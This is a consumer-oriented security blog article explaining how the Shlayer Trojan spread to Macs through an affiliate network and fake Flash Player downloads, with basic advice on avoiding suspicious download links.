How a Social Engineering Assault Targets 10% of Mac Computers

The Shlayer Trojan, a remarkably persistent piece of malware, has impacted 1 in 10 MacOS systems since 2019. Despite making its first appearance in 2018, it remains a significant threat, accounting for 30% of all MacOS malware detections in 2019, as reported by Kaspersky, a leading antivirus software provider.

Its widespread prevalence can largely be attributed to the ingenious propagation methods devised by its creators, despite the malware’s relatively ordinary nature. This high infection rate challenges the myth of Mac’s inherent immunity to such threats.

This revelation might be a silver lining, as heightened user awareness is a critical defense against malware spread, which thrives on ignorance.

The key to Shlayer’s success and its enduring presence? The answer lies in its simplicity.

A Basic Virus Turns Lethal Through Affiliate Networks

Shlayer is a sophisticated Trojan downloader that operates stealthily, installing malware, pilfering browsing data, and bombarding users with malicious advertisements. What sets the Shlayer Trojan apart is its unique distribution strategy, which leverages legitimate platforms through active promotion by webmasters and content creators. Remarkably, the architects behind this virus have established an extensive network of affiliates, including YouTubers, Wikipedia contributors, and website owners, incentivizing them with a $4 commission for each user they direct to fraudulent flash downloads. Kaspersky counted more than 1,000 partner sites involved in the scheme.

more than 1,000 partner sites involved in Shlayer scheme

Partners employ various tactics to entice users into clicking on malicious download links. For example, a YouTuber might include a shortened link in their video description, while Wikipedia contributors might embed the dangerous link within citations. For webmasters, the process is straightforward: they need only insert a prompt with the harmful link.

Although tricking users into clicking a malicious link is one of the oldest strategies in a hacker’s playbook, allowing the virus to wreak havoc on the victim’s system, it’s uncommon to see cybercriminals evolve this tactic into a fully operational, sustainable business model.

In this innovative business model, the creators act as investors, offering a $4 commission per installation to their partners, who are legitimate content creators. This approach implies that the infection triggered by clicking the malicious link must generate substantial monetization opportunities, justifying the cybercriminals’ investment.

Shlayer acts primarily as a delivery mechanism for payloads comprising adware, forced web redirects, and other malware that tracks browser activity. Through these malicious activities, cybercriminals can profit significantly by diverting user traffic to dangerous websites, harvesting and selling browser histories, cookies, and caches to advertisers, and displaying sponsored advertisements.

Although there’s no precise estimate of their earnings, considering their willingness to pay a $4 commission per installation and the fact that 10% of Macs are impacted, even a conservative estimation points to profits in the millions of dollars.

The creators of the virus have certainly pulled off a masterstroke of social engineering leading to the continued existence of the virus and its high profit-potential.

Preventing the Attack

To clarify, Apple isn’t necessarily at fault for attacks of this nature, as the Trojan doesn’t exploit any vulnerabilities in MacOS itself. Instead, the real issue with social engineering attacks lies in their exploitation of the users, not the system’s flaws.

Security measures like anti-malware and VPNs can enhance safety online, but nothing beats the effectiveness of increased awareness. In the instance of Shlayer, the attackers preyed on user naivety, depending heavily on it for the malware’s success.

It’s worth noting that Shlayer propagates through deceptive Flash Player downloads, exploiting a common oversight: many are unaware that Flash is now obsolete, with modern browsers requiring no such plugin to access online content.

Shlayer Trojan Mac malware through fake Flash update

While using VPNs and anti-viruses is still extremely important to maintain security and privacy on your Mac, the single greatest cause behind a lot of malware outbreaks is user ignorance.

Most victims of the Shlayer virus are guilty of the same ignorance because they clicked on a link to download a phony Flash player. The truth is, you don’t need Flash in 2020 and if only more people were aware of this, it’s certain that Shlayer would not have been so wildly successful in infecting millions of Macs.

Therefore, the best piece of preventive action that you can take to avoid Shlayer and similar forms of malware is this: don’t click shady links! If a website wants you to download Flash Player or any other software in order to access a live stream through an unofficial channel or get something for free, it’s almost always a malicious link that can compromise your privacy and/or threaten the stability of your Mac.

It also helps to gather more information about the website you want to visit first. Search around the web to try and find out its reputation and any user comments to see if it is a website that people trust.

Finally, combine these common sense measures with a good anti-virus and VPN equipped with ad-blockers. This regimen should be adequate to avoid most forms of malware out there, especially those that rely on social engineering like Shlayer.

Bottom Line

MacOS is a robust operating system. But against human ignorance, the only cure is awareness. No OS, be it MacOS, Windows or others, is immune to the exploits of clever cybercriminals that deceive internet users for a living. The only foolproof way to avoid falling victim to the next virus that rears its head is to resist the temptation of clicking any suspicious download links appearing on unofficial websites. You’ll probably avoid more than half the malware crawling over the web without even realizing it.

Leave a Reply

Your email address will not be published. Required fields are marked *